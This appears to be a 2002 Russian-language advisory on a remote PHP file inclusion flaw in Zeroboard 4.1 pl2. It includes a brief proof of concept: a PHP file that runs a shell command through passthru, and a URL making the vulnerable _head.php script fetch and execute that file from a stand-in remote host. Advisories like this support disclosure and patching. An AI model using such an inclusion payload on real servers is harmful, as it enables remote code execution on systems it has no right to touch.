Выполнение произвольного PHP кода в Zeroboard

Дата публикации:
18.06.2002
Всего просмотров:
1641
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Zeroboard – PHP доска объявлений для LINUX и UNIX платформ.

Уязвимость позволяет включать произвольные PHP файлы. Файл _head.php не достаточно санирует входящие параметры. Если в php.ini установлены переменные "allow_url_fopen" и "register_globals" в значение “on”, можно включить произвольные PHP файлы из удаленного URL через сценарий _head.php. Пример:

PHP Source file a.php 
<? passthru("/bin/ls"); ?> 

Accessing URL on vulnerable system: 
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a
уязвимость обнаружена в Zeroboard 4.1 pl2

Ссылки: malicious PHP source injection
или введите имя

CAPTCHA